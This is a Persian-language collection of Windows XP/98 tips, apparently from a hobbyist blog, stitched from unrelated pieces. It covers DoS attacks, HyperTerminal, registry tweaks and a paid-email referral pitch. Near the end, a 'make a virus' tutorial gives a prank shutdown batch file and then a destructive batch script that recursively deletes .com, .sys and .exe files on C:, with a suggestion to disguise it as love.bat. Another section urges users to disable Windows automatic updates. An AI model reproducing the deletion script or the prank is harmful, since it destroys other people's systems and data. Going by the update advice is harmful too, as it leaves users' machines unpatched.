GmailerXP - برنامه‌اي براي كار راحت‌تر با جي‌ميل با ظاهري شبيه پنجره‌هاي ويندوز XP.
GmailCompose - برنامه الحاقي به مرورگر موزيلا فايرفاكس براي باز كردن پنجره ارسال ايميل جي‌ميل.

 شايد تاکنون شنيده باشيد که يک وب سايت مورد تهاجمى از نوع DoS قرار گرفته است . اين نوع از حملات صرفا" متوجه وب سايت ها نبوده و ممکن است شما قربانى بعدى باشيد. تشخيص حملات DoS از طريق عمليات متداول شبکه امرى مشکل است ولى با مشاهده برخى علائم در يک شبکه و يا کامپيوتر مى توان از ميزان پيشرفت اين نوع از حملات آگاهى يافت .

حملات از نوع ( DoS ( denial-of-service
در يک تهاجم از نوع DoS ، يک مهاجم باعث ممانعت دستيابى کاربران تائيد شده به اطلاعات و يا سرويس هاى خاصى مى نمايد . يک مهاجم با هدف قرار دادن کامپيوتر شما و اتصال شبکه اى آن و يا کامپيوترها و شبکه اى از سايت هائى که شما قصد استفاده از آنان را داريد ، باعث سلب دستيابى شما به سايت هاى Email ، وب سايت ها ، account هاى online و ساير سرويس هاى ارائه شده بر روى کامپيوترهاى سرويس دهنده مى گردد .
متداولترين و مشهودترين نوع حملات DoS ، زمانى محقق مى گردد که يک مهاجم اقدام به ايجاد يک سيلاب اطلاعاتى در يک شبکه نمايد.

زمانى که شما آدرس URL يک وب سايت خاص را از طريق مرورگر خود تايپ مى نمائيد ، درخواست شما براى سرويس دهنده ارسال مى گردد . سرويس دهنده در هر لحظه قادر به پاسخگوئى به حجم محدودى از درخواست ها مى باشد، بنابراين اگر يک مهاجم با ارسال درخواست هاى متعدد و سيلاب گونه باعث افزايش حجم عمليات سرويس دهند گردد ، قطعا" امکان پردازش درخواست شما براى سرويس دهنده وجود نخواهد داشت. حملات فوق از نوع DoS مى باشند، چراکه امکان دستيابى شما به سايـت مورد نظر سلب شده است .
يک مهاجم مى تواند با ارسال پيام هاى الکترونيکى ناخواسته که از آنان با نام Spam ياد مى شود ، حملات مشابهى را متوجه سرويس دهنده پست الکترونيکى نمايد . هر account پست الکترونيکى ( صرفنظر از منبعى که آن را در اختيار شما قرار مى دهد ، نظير سازمان مربوطه و يا سرويس هاى رايگانى نظير ياهو و hotmail ) داراى ظرفيت محدودى مى باشند. پس از تکميل ظرفيت فوق ، عملا" امکان ارسال Email ديگرى به account فوق وجود نخواهد داشت . مهاجمان با ارسال نامه هاى الکترونيکى ناخواسته سعى مى نمايند که ظرفيت account مورد نظر را تکميل و عملا" امکان دريافت email هاى معتبر را از account فوق سلب نمايند .

حملات از نوع ( DDoS (distributed denial-of-service
در يک تهاجم از نوع DDoS ، يک مهاجم ممکن است از کامپيوتر شما براى تهاجم بر عليه کامپيوتر ديگرى استفاده نمايد . مهاجمان با استفاده از نقاط آسيب پذير و يا ضعف امنتيى موجود بر روى سيستم شما مى توانند کنترل کامپيوتر شما را بدست گرفته و در ادامه از آن به منظور انجام عمليات مخرب خود استفاده نمايند. ارسال حجم بسيار بالائى داده از طريق کامپيوتر شما براى يک وب سايت و يا ارسال نامه هاى الکترونيکى ناخواسته براى آدرس هاى Email خاصى ، نمونه هائى از همکارى کامپيوتر شما در بروز يک تهاجم DDOS مى باشد . حملات فوق ، "توزيع شده " مى باشند ، چراکه مهاجم از چندين کامپيوتر به منظور اجراى يک تهاجم DoS استفاده مى نمايد .

نحوه پيشگيرى از حملات
متاسفانه روش موثرى به منظور پيشگيرى در مقابل يک تهاجم DoS و يا DDoS وجود ندارد . عليرغم موضوع فوق ، مى توان با رعايت برخى نکات و انجام عمليات پيشگيرى ، احتمال بروز چنين حملاتى ( استفاده از کامپيوتر شما براى تهاجم بر عليه ساير کامپيوتر ها ) را کاهش داد .

نصب و نگهدارى نرم افزار آنتى ويروس ( جايگاه نرم افزارهاى ضدويروس ) .

نصب و پيکربندى يک فايروال ( فايروال چيست ؟ )

تبعيت از مجموعه سياست هاى خاصى در خصوص توزيع و ارائه آدرس Email ( توصيه هائى براى کاهش Spam ) .

چگونه از وقوع حملات DoS و يا DDoS آگاه شويم ؟
خرابى و يا بروز اشکال در يک سرويس شبکه ، همواره بدليل بروز يک تهاجم DoS نمى باشد . در اين رابطه ممکن است دلايل متعددى فنى وجود داشته و يا مدير شبکه به منظور انجام عمليات نگهدارى موقتا" برخى سرويس ها را غير فعال کرده باشد . وجود و يا مشاهده علائم زير مى تواند نشاندهنده بروز يک تهاجم از نوع DoS و يا DDoS باشد :

کاهش سرعت و يا کارآئى شبکه بطرز غير معمول ( در زمان باز نمودن فايل ها و يا دستيابى به وب سايت ها ) .

عدم در دسترس بودن يک سايـت خاص (بدون وجود دلايل فنى )

عدم امکان دستيابى به هر سايتى (بدون وجود دلايل فنى )

افزايش محسوس حجم نامه هاى الکترونيکى ناخواسته دريافتى

در صورت بروز يک تهاجم ، چه عملياتى را مى بايست انجام داد ؟
حتى در صورتى که شما قادر به شناسائى حملات از نوع DoS و يا DDoS باشيد ، امکان شناسائى مقصد و يا منبع واقعى تهاجم ، وجود نخواهد داشت . در اين رابطه لازم است با کارشناسان فنى ماهر ، تماس گرفته تا آنان موضوع را بررسى و براى آن راهکار مناسب را ارائه نمايند .

در صورتى که براى شما مسلم شده است که نمى توانيد به برخى از فايل ها ى خود و يا هر وب سايتى خارج از شبکه خود دستيابى داشته باشيد ، بلافاصله با مديران شبکه تماس گرفته و موضوع را به اطلاع آنان برسانيد . وضعيت فوق مى تواند نشاندهنده بروز يک تهاجم بر عليه کامپيوتر و يا سازمان شما باشد .

در صورتى که وضعيت مشابه آنچه اشاره گرديد را در خصوص کامپيوترهاى موجود در منازل مشاهده مى نمائيد با مرکز ارائه دهنده خدمات اينترنت ( ISP ) تماس گرفته و موضوع را به اطلاع آنان برسانيد . ISP مورد نظر مى تواند توصيه هاى لازم به منظور انجام عمليات مناسب را در اختيار شما قرار دهد .
 

برنامه اي است كه توسط آن مي توانيد با استفاده از خطوط تلفن (و بدون نياز به اينترنت) فايلهايي را از هر نوع به دوستانتان ارسال و يا از آنها فايلهايي را دريافت نماييد.

شايد شما هم مانند من از ارسال فايلها توسط ابزار ذخيره سازي (مانند CD، ديسك و...) خسته شده ايد در اين قسمت قصد داريم به بررسي يكي از قابليتهاي جذاب و كمتر شناخته شده ويندوز كه توانايي بالايي در ارسال و دريافت فايلهاي مختلف به نام Hyper Terminal بپردازيم.

HyperTerminal چيست؟

HyperTerminal برنامه اي است كه توسط آن مي توانيد با استفاده از خطوط تلفن (و بدون نياز به اينترنت) فايلهايي را از هر نوع به دوستانتان ارسال و يا از آنها فايلهايي را دريافت نماييد. در صورت كار با اين برنامه در بسياري از موارد شما ديگر نيازي به استفاده از اينترنت نخواهيد داشت، بنابراين قادريد در هزينه هاي اتصال به اينترنت تا حد زيادي صرفه جويي كنيد.

برنامه Hyper Terminal به صورتي كاملاً ساده و آسان طراحي گرديده به صورتي كه شما با چند بار كار كردن با آن مي توانيد با نحوه كار كاملاً آشنا گرديد.

نكته: براي استفاده از HyperTerminal شما به امكانات خاص نياز نداريد فقط كافي است كه كامپيوتر شما و فردگيرنده به يك مودم مجهز باشد تا شما از طريق خط تلفن فايل مورد نظرتان را ارسال و يا دريافت نماييد.

نحوه استفاده از Hyper Terminal

براي فعال نمودن HyperTerminal در ويندوز xp به روي كليد Start كليك نموده و از منوي كشويي ظاهر شده به ترتيب Accessories < All programs < Hyper Terminal< Communications را انتخاب كنيد تا پنجره Connection Description در روي صفحه نمايش ظاهر گردد.

در كادر فوق يك نام را براي اتصال وارد كرده و از قسمت Icon يك آيكون را به دلخواه انتخاب نموده و بر روي كليد OK كليك كنيد.

در پنجره Connect To از منوي كشويي Country / region كشور محل سكونت خود (كه در اينجا IRAN را بايد انتخاب نماييد مگر اينكه خارج از ايران زندگي مي كنيد)، AreaCode كد كشور، phonenumber شماره تلفن تماس و از منوي ConnectUsing ابزار مورد استفاده (كه در اين جا مودم مي باشد) را انتخاب كرده و برروي كليد OK كليك نماييد.

نكته: در قسمت phone number شما بايد شماره تلفن شخصي كه مي خواهيد براي او فايل مورد نظرتان را ارسال كنيد را وارد نماييد.

در پنجره Connect شما كافي است بر روي كليد Dial كليك كنيد تا شماره گيري انجام گيرد. در اين مرحله در صورتي كه مي خواهيد تغييري در شماره تلفن تماس و يا محل سكونت خود دهيد كافي است برروي كليدهاي Modify يا Dialing properties كليك كرده و در كادرهاي محاوره اي ظاهر شده تغييرات مورد نظر را اعمال نماييد. بعد از چند لحظه شماره گيري توسط مودم انجام مي شود.

تنظيماتي كه فرد گيرنده بايد انجام دهد

براي دريافت يك فايل از طريق HyperTerminal فقط كافي است در پنجره اصلي برنامه از منوي Call گزينه Wait For a Call را انتخاب نماييد. بعد از چند لحظه شما مي توانيد فايلهاي ارسالي را دريافت كنيد.

ارسال فايلها

بعد از اينكه در پنجره Connect تنظيمات مربوطه را انجام داديد و توسط شماره گيري به شماره مربوطه متصل شديد. براي مشخص كردن فايلهاي ارسالي از منوي Transfer گزينه Send File را انتخاب كنيد تا كادر محاوره اي Send File در روي صفحه نمايش ظاهر گردد.
در كادر محاوره اي ظاهر شده براي انتخاب فايل مورد نظرتان بر روي كليد Browse كليك كنيد تا كادر محاوره اي Select File to Send در روي صفحه نمايش ظاهر گردد.

در كادر محاوره اي فوق شما كافي است فايل مورد نظرتان را انتخاب نموده و بر روي كليد Open كليك نماييد و در كادر محاوره اي Send file بر روي كليد Send كليك كنيد تا عمل ارسال انجام پذيرد.

ارسال پيغام به صورت متن

بعد از اينكه به شماره مورد نظرتان متصل شديد در پنجره اصلي برنامه Hyper Terminal شما به صورت مستقيم مي توانيد متن مورد نظرتان را تايپ نماييد. متن تايپي در اين قسمت براي دوست شما كه به كامپيوتر او توسط برنامه Hyper Terminal متصل شديد نيز قابل مشاهده مي باشد.

مشخص كردن محلي براي ذخيره سازي فايلهاي دريافتي

شما به سادگي مي توانيد محلي را براي ذخيره سازي فايلهاي دريافتي از طريق برنامه را به صورت پيش فرض تعريف نماييد. براي اين منظور از منوي Transfer گزينه Receive File را انتخاب نماييد تا كادر محاوره اي مربوطه در روي صفحه نمايش ظاهر گردد. در كار محاوره اي فوق شما با كليك نمودن كليد Browse مي توانيد محلي را براي ذخيره سازي فايل دريافتي تعيين نماييد.

ذخيره سازي اتصال

بعد از برقراري ارتباط از طريق برنامه Hyper Terminal، شما مي توانيد اتصال فوق را براي استفاده مجدد ذخيره نماييد. براي اين منظور از منوي كشويي File گزينه Save را انتخاب كنيد. با اين كار اتصال شما با اسمي كه شما براي آن مشخص نموده ايد ذخيره مي گردد، براي برقراري اتصال براي دفعات آتي، در زير منوي Accessories < All Programs < Start HyperTerminal Communications كافي است به روي نام اتصال فقط كليك كنيد.

قطع نمودن اتصال

بعد از اينكه فايل هاي موردنظرتان را براي دوستانتان ارسال كرديد و يا از آنها دريافت كرديد، براي قطع نمودن اتصال به روي گزينه Disconnect كليك نماييد تا اتصال شما قطع گردد.

نوار ابزار برنامه Hyper Terminal

در نوار ابزار برنامه HyperTerminal مجموعه دستورات پراستفاده به صورت آيكونهايي در دسترس شما قرار گرفته است. در صورتي كه نوار ابزار برنامه در زير نوار منوها وجود نداشت از زير منوي View گزينه ToolBar را انتخاب كنيد.

برای یک بار هم که شده امتحان کنید .

من که خیلی راضی هستم.فعلا" این یه آدرس رو مینویسم تا بعد بقیشو براتون میزارم

كار كرد اين سايت بسيار عالي مي باشد روزانه ميلهاي زيادي براي شما مي فرستد كه داراي ارزش   5،10،15،20سنت است در هنگام ثبت نام 5 دلار به شما جايزه مي دهد و وقتي پول شما به 100 دلار رسيد مي توانيد تقاضاي دريافت داده و آن را دريافت نماييد. درآمد روزانه اين سايت ۲ تا ۸ دلار مي باشد .

لازم به عرض است که اين سايت فوق العاده ، ۳ روز پس از درخواست ، پول را به حساب ايگولد شما واريز مي كند .

برای عضویت در این سایت یا اینجا کلیک کنید و یا بر روی لینگ پایین

چگونه كامپيوتر خود را سريعترRestart كنيم (فقط در ويندوز98)

يكي از راههاي سريعتر restart كردن كامپيوتر گرفتن دكمه shift هنگام انتخاب گزينه restart است .اما ما روشي ديگر را به شما مي آموزيم و فقط كافي است اين ترفند را دنبال كنيد .برنامه Notepad خود را اجرا كرده . فايل جديدي را باز كنيد و سپس عبارت EXIT را در ان تايپ كنيد و فايل مذكور را با نام دلخواه خود و با پسوند .bat ذخيره كنيد .حال Shortcut يا ميانبري از فايل مورد نظر را روي صفحه نمايش خود ايجاد كنيد . سپس روي آن كليك سمت راست كرده .از منوي ظاهر شده گزينه Propertis را انتخاب كنيد .در پنجره ظاهر شده به بخش Program رفته و مطمئن شويد كه گزينه close on exit روشن است . سپس به بخش Advanced برويد و مطمئن شويد كه گزينه Ms-dosmode روشن است و گزينه Warnbeforeenteringms-dos خاموش باشد . حال Shortcut را كه در صفحه نمايش خود ايجاد كرديد اجرا كني .

از بين بردن پيغام بر ميکروسافت(XP)

ابتدا وارد RUN شده و دستور زير را با دقت تايپ کنيد :

rundll32 advpack.dll,LaunchINFSection windir%INFmsmgs.inf,BLC.Remove
حال OK را کليک کرده و برای هميشه از دستش راحت شويد.

تغيير نام دسته جمعی فايلهای تصويری....!

۱.ابتدا تمام عکسهايی را که ميخواهيد تغيير نام دهيد انتخاب کنيد.
۲.روی اولين عکس کليک سمت راست کرده سپس آنرا Rename کنيد.(مثلا MyPicture )
۳.در حالی که Shift را نگه داشته اید،بين فظای خالی بين عکس اول و دوم کليک کنيد.
۴.نتيجه را ببينيد.

اين ترفند را در مورد هر نوع فايل به کار برد و نه فقط در مورد فايلهای تصويری.

نصب ويندوز XP بدون وجود هيچ سيستم عاملي

اين دستور مواقعی مورد استفاده است که هيچ سيستم عاملی از قبل وجود نداشته باشد يا بخواهيد ويندوز XP را در کنار سيستم عامل ديگری نصب کنيد :

۱.ابتدا کامپیوتر را با StartUp ويندوز بوت کنید.
۲.CD ويندوز 98را در CD-ROM قرار داده و برنامه Smartdrv.exe را اجرا کنيد.
۳.حال CD ويندوز XP را در سيستم قرار داده و دايرکتوري I386 را به :c کپی کنيد.
۴.به دايرکتوری C:I386 برويد و فرمان winnt32.exe را صادر کنيد.

 با اين کار در موقع BOOT شدن حالت انتخابی داريد.

چگونه در حالت Safe Mode ويندوز CD-Rom داشته باشيم(در Windows 98)

شما مي توانيد در حالت SafeMode در ويندوز كه نمي توان از سي دي استفاده كرد از CD-Rom استفاده نماييد فقط كافي است كه هنگامي كه كامپيوتر دارد بوت مي شود كليد Ctrl را فشار دهيد تا همان هفت گزينه بيايد در اينجا شما Command Prompt Only را انتخاب كنيد تا داس بيايد حالا در خط فرمان داس اين دستور را بنويسيد :
win /d:m
حالا ويندوز در حالت SafeMode بالا مي آيد الآن شما بايد سي دي درايو داشته باشيد ولي اگر سي دي درايو هنوز نداشتيد بايد درايور سي دي درايو خود را نصب نماييد تا از سي دي درايو بتوانيد در اين حالت استفاده نماييد.

اضافه کردن اطلاعات اضافي در System Properties

اگر بر روي My Computer کليک سمت راست ماوس را زده و از منوي ظاهر شده، گزينه Properties را انتخاب کنيد، پنجره System Properties ظاهر مي شود. اگر مي خواهيد در اين پنجره، اطلاعات ديگري را وارد کنيد، بايد به صورت زير عمل کنيد.
يک عکس با سايز 180x۱۱۴ به وجود آورده و آن را با نام Oemlogo و پسوند bmp، در شاخه SystemRoot%\System% ذخيره نماييد. سپس عبارات زير را در برنامه Notepad تايپ نموده و آن را تحت عنوان Oeminfo و با پسوند ini، در شاخه SystemRoot%\System% ذخيره نماييد. (بعد از علامت =، مي توانيد عبارت مورد نظر خود را تايپ نماييد.)

Manufacturer=Your Text Goes Here
Model=Your Text Goes Here
[Support Information]
Line1=Your Text Goes Here
Line2=Your Text Goes Here
.
.
.
LineN=Your Text Goes Here

* چنان چه عکس مورد نظر شما، نشان داده نشد، آن را در سايز 160x۱۲۰ تنظيم نماييد.

لينک مستقيم براي Download

حتما تا به حال براي شما پيش آمده است که بخواهيد فايلي را از اينترنت بگيريد، ولي به دليل اينکه سايت مورد نظر، لينک مسقيم را درون سايت خود قرار نداده بود، شما مجبور بوديد که به وسيله خود Browser آن را Download کنيد که اين راه مشکلاتي را نيز در برداشت. مثلا اگر شما Disconnect مي شديد، مجبور بوديد که فايل مورد نظر خود را از ابتدا Download کنيد. اما به وسيله اين روش، ابتدا مي توانيد لينک مستقيم براي Download فايل مورد نظر خود را پيدا کنيد و سپس به وسيله نرم افزارهايي همانند Go!Zilla, DAP, GetRight, FlashGet و ... شروع به Download فايل مورد نظر کنيد.
ابتدا بر روي لينک داده شده در سايت، کليک سمت راست ماوس را زده و از منوي ظاهر شده گزينه Open In New Window را انتخاب کنيد (و يا اينکه کليد Shift را نگه داشته و بر روي لينک کليک کنيد). پنجره جديدي باز مي شود. پس از گذشت 5 الي 6 ثانيه، کليد ESC را فشار دهيد و يا دکمه Stop موجود در Browser خود را کليک کنيد تا بارگذاري صفحه متوقف شود. به قسمت Address Bar رفته و کليد Enter را فشار دهيد تا صفحه مورد نظر، دوباره شروع به بارگذاري شود. حال در قسمت Status Bar، لينک مستقيم فايل را مشاهده نماييد.

ISP خود را بيشتر بشناسيد!

يک شيوه بسيار موثر برای پيدا کردن سرعت و کيفيت يک ISP استفاده از دستور Ping است.
نحوه عملکرد اين دستور به اين صورت است که يک بسته ۳۲ بايتی را به آدرس مورد نظر شما ميفرستد و منتظر پاسخ ميماند. براساس زمان بدست آمده از اين رفت و برگشت ميتوان به سرعت واقعی ISP پی برد. برای اجرای اين دستور بصورت زير عمل کنيد.
۱- Command Prompt را اجرا کنيد. ( در ويندوز ۲۰۰۰ و نسخه های جديدتر ويندوز Run را کليک کرده cmb زا تایپ نماييد )
۲- در صفحه Command Prompt دستور Ping www.yahoo.com-t را تایپ کرده و Enter را بزنيد. به جای ياهو هر آدرس ديگری ميتوانيد استفاده کنيد.
۳- برای ديدن نتيجه ctrl+Break و برای خاتمه ctrl+c را بزنيد.
پس از زدن دکمه های بالايی اطلاعات بدست آمده از عمل Ping نشان داده ميشود که شامل تعداد بسته های فرستاده شده و دريافت شده، درصد از دست رفتن بسته ها و زمان round tripاست. حال اگر در قسمت Average ميانگين به دست آمده حدود ۷۰۰ باشد، نشان دهنده سرعت مطلوب ISP شما است و اگر اين عدد بالای ۱۰۰۰ باشد و يا نرتبا پيام Request timed out دريافت کرده باشيد ISP شما چندان تعريفی ندارد. البته بايد توجه داشته باشيد که زمان های بدست آمده به کيفيت سرويس دهنده وب سايتی که آن را Ping ميکنيد نيز بستگی دارد. بنابراين توصيه ميشود سايتی را ping کنيد که از کيفيت آن مطمئن باشيد، مثلاْ Yahoo

طريقه انتخاب کردن يک Background براي يک پوشه خاص

همان طور که مي دانيد، در ويندوز 98 و ME، مي توانيد از منوي View گزينه Customize this folder را انتخاب کرده و بعد از انجام مراحل کار، يک عکس را به عنوان Background آن پوشه در نظر بگيريد. ولي در ويندوز XP چه طور. اگر بخواهيد اين کار را در ويندوز XP انجام دهيد، بايد تمامي کارهايي را که ويزارد (Wizard) در ويندوز 98 و ME انجام مي داد، خودتان انجام دهيد.
براي اين کار ابتدا Notepad را باز کرده و عبارات زير را در آن تايپ نماييد:

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=The Address Of Picture Goes Here
IconArea_Text=Color Of Texts Goes Here (e.g: 0x00FFFFFF)

در قسمت IconArea_Image، بايد مسير عکس خود را بنويسيد که پسوند آن بايد jpg، bmp و يا gif باشد. در قسمت IconArea_Text، رنگ نوشته هاي درون پوشه را مشخص مي کنيد.
اگر مي خواهيد که عکس پوشه مورد نظر، در تمامي ويندوزها به نمايش در بيايد، بايد از کد زير استفاده کنيد:

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=The Address Of Picture Goes Here
IconArea_Text=Color Of Texts Goes Here (e.g: 0x00FFFFFF)

[.ShellClassInfo]
ConfirmFileOp=0

مخفی كردن درايوها!

با اين ترفند دوستان عزيز مي توانند هر يک از درايوهاي موجود در سيستم خود را ناپديد مي کند
ابتدا به کمک دستورregedit رجيستري خود را باز نماييد سپس به اين کليد مراجعه کنيد
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version \ Policies\Explorer
و يک متغير جديد از نوع DWORD ساخته و نام آن را NoDrivers بگذاريد مقداري که براي اين متغير تعيين مي کنيد نشان مي دهد که چه درايوهايي مرپي هستند راست ترين بيت مربوط به گردونه ي:A
و بيت بيست و ششم مربوط به گردونه ي :Z است براي مخفي کردن هر درايو کافي است بيت آن را روشن کنيد.
اگر با اعداد هگزا ميانه خوبي نداريد مي توانيد مي توانيد از اعداد دسيمال زير براي مخفي کردن هر درايو يا چند درايو استفاده کنيد مثل اعداد زير :
A:1 , B:2 , c:4 , D:8 , E:16 , F:32 و...........
براي ناپديد کردن تمام درايوها مي توانيد عدد دسيمال ۶۷۱۰۸۸۶۳ را به متغير NoDrives بدهيد .
نکته :
این درایوهاهم چنان در برنامه ی مدیر فایل ظاهر خواهند شد برای از بین بردن این برنامه باید فایل winfile.exeرا حذف نماييد.

ترفندهاي رجستري ويندوز براي خارج نمودن برنامه ازحافظه

اولين ترفند خارج کردن برنامه از حافظه هنگام Shut down است. شايد تا حالا به اين مشکل برخورد کرده باشيد که وقتی ميخواهيد از ويندوز خارج بشيد پيغامی مبنی براينکه آيا ميخواهيد فلان برنامه در حال اجرا رو از حافظه خارج کنيد يا نه؟ روی صفحه نشان داده ميشود. برای اينکه ويندوز به طور اتوماتيک چنين برنامه هايی را از حافظه بيرون بياورد، از طريق برنامه Run عبارت regedit را تايپ کرده و وارد رجستری ويندوز بشيد. آدرس زير را دنبال کنيد :
[ HKEY_USER\.DEFAULT\Control Panel\Desktop]
حالا يک مقدار رشته ای به نام AutoEndTasks بسازيد و به آن مقدار ۱ را بدهيد.
ترفند دومی اينه که برنامه های خاطی را به سرعت از حافظه ويندوز خارج کنيد. زمانی که کليدهای ‍Ctrl+Alt+Delete را برای خارج کردن يک برنامه خاطی فشار ميدهيد و يا زمانی که ميخواهيد از ويندوز خارج شويد و ويندوز ميخواهد يک برنامه خاطی را از حافظه خارج سازد پيغام را به برنامه حاطی ميفرستد و 20 ثانيه صبر ميکند تا برنامه جواب دهد و در صورتي که جوابی دريافت نکند برنامه را از حافظه خارج ميکند. برای اينکه زمان انتظار را کاهش دهيم در رجستری ويندوز آدرس زير را دنبال کنيد:
[ HKEY_CURRENT_USER\Control Panel\Desktop]
يک مقدار رشته ای به نام WaitToKillAppTimeout مشاهده خواهيد کرد که حاوی 20000 ميلی ثانيه (20 ثانيه) است. اين مقدار را به هر زمانی که دوست داريد تغيير دهيد و توجه داشته باشيد که زمان بر حسب ميلی ثانيه است.

مشکلی که بسياری از کاربران اينترنت دارند !

ويندوز XP اين قابليت را داراست که ميتواند وقتی به اينترنت متصل ميشويد به طور خود کار فايل های سيستم را به روز رساند و آن ها را از سايت مايکروسافت در يافت کند . اما اين امکان بيشتر برای کاربرانی است که نسخه اصلی ويندوز را خريده اند ( نه ايران! ) و به سرعت بالای اينترنت دسترسی دارند . برای اينکه نزدیک به 100 Mb است و هفتگی هم زيادتر ميشود ! وقتی که به اينترنت متصل ميشويد کمی طول ميکشد تا اين امکان فراهم شود . ولی بايد توجه داشت که سرعت اينترنت شما نيز کم ميشود . پس بهتر است که آن را غير فعال کنيد !
برای غير فعال کردن به روز کردن ويندوز روی آيکون My Computer کليک راست کرده و گزينه Properties را انتخاب نمایيد . در کادر باز شده به زبانه Automatic Updates برويد و در قسمت Notification Setting ، گزينه Turn Off Automatic Updating را انتخاب نماييد . در پايان دکمه Apply و OK را کليک کنيد .
چيز راحتی هست و ظاهرآ خيلی ساده ولی 50% کاربران به همين علت از سرعت اينترنت خود به شرکتی که اينترنت ميگيرند شاکی می شوند !

قسمت اول ویروس بلاستر:

امروز يادميگيريم كه:

1- چگونه ويروس Blaster را بسازيم

2- چگونه براي BatchFile ها آيكون بسازيم

3- چگونه خودمان در Notepad ترفند كشف كنيم!!!

فكر ميكنم همه شما ويروس Blaster را بشناسيد ويروسي كه باعث Shutdown شدن كامپيوتر در 60 ثانيه ميشد... و حتي عده كثيري از شما روش ساخت آن را بدانيد ولي در پايان اين سري مقالات و جهت تكميل اين سري از مقالات لازم ميدانم نگاهي سريع به آن بيندازيم و سپس به نكات تكميلي اين سري مقالات ميپردازيم. اين ويروس را به طرق مختلفي و با دستورات گوناگوني ميتوان نوشت كه در اينجا دو روش را مورد بررسي قرار ميدهيم در ضمن لطفا اگر با اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد .

روش اول/ با استفاده ازShortcut در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:

shutdown -s -t xx -1

windir%system32shutdown.exe -s -t xx% -2

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است!!.

روش دوم/ به كمكNotepad نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيدفكر ميكنم تا به حال بايد متوجه شده باشيد كه bat مخفف BatchFile است. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:

shutdown -a

و همه مراحل قبل را انجام دهيد. اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد مقالات اين يك هفته:

خيلي ها سوال ميكنند كه چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد .

تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد؟؟؟!!!. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟؟. بله اين محيط متني به نسبت ناشناخته همان اديتور داس Dos Editor است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد!. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit صبر كنيد!!!قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد اينجا از كليدي به نام Undo خبري نيست!! همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد... اما براي اينكه كار با اديتور آشنا شويد و خودتان ترفندي كشف كنيد مطابق زير عمل كنيد:

1- وارد داس شويد و تايپ كنيد Edit تا وارد اديتور شويد كه صفحه اي آبي رنگ است

2- از منوي بالاي صفحه File را انتخاب و روي Open كليك كنيد.

3- به اين مسير برويد:C / WINDOWS و در پنجره سمت چپ دنبال فايلي به نام explorer.scf بگرديد اگر يادتان باشد شما در مقالات قبلي فايل ديگري را نيز با پسوند scf ساخته بوديد... يادتان مي آيد؟؟آيكون Show Desktop بود.

4- متني كه در آن ميبينيد را عينا درون Notepad وارد كنيد و فايل خود را باهمان پسوند scf سيو كنيد. به اين طريق برنامه explorer.scf بر روي صفحه ظاهر ميشود.. بله شما اولين ترفند خود را خودتان ساختيد!!! به اين وسيله شما ميتوانيد خودتان در Notepad ترفند كشف كنيد!!!! من هم به همين طريق اين ترفندها را براي شما مي نوشتم.

خوب ساختن ویروس رو آغاز می کنم

روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل love.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

تا قبل از دهه 90 استفاده از اينترنت برای مردم عادی به سادگی امكان‌پذير نبود، چرا كه استفاده از امكانات اينترنت نياز به دانش خاصی داشت. محيط خط فرماني(Command Line) و ساختار غير گرافيكی اينترنت سبب شده بود كه كاربران عادی علاقه چندانی به استفاده از اينترنت نداشته باشند.

در اوايل دهه 90، پس از به وجود آمدن مفهوم وب در اينترنت (سال 1993 ) و پروتكل HTTP كه به سادگی امكان به اشتراك گذاشتن مستندات در اينترنت را در اختيار كاربران قرار می‌داد، روز به روز بر تعداد كاربران اينترنت افزوده شد. از سوی ديگر با اضافه شدن كاربران اينترنت، حجم مستندات نيز روز به روز افزايش يافت. مسلماً خطوط سابق اينترنتی و سرورهای موجود، توانايی جوابگويی به خيل عظيم كاربران را نداشتند.

